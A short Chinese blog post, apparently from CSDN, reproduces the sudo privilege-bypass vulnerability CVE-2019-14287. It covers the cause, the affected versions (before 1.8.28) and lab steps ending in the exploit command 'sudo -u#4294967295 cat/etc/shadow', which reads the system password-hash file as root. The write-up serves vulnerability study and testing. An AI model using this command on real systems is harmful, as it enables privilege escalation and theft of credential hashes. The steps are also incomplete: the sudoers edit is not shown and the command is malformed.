一、 漏洞成因
管理员在sudo配置文档中用了ALL关键字造成的。
sudo权限绕过漏洞,sudo,Linux系统管理命令,允许用户在不切换环境的前提下,以其他用户的权限运行应用程序或命令。
二、 影响版本
1.8.28之前的所有版本
三、 漏洞复现
1、 查看sudo版本
sudo -V
2、 新建账户
useradd test
passwd test
3、 修改sudo配置文件
vim /etc/sudoers
4、 切换到test用户
执行sudo命令
sudo -u#4294967295 cat/etc/shadow 或者
CVE-2019-14287复现
最新推荐文章于 2024-05-11 11:29:51 发布
![](https://img-home.csdnimg.cn/images/20240711042549.png)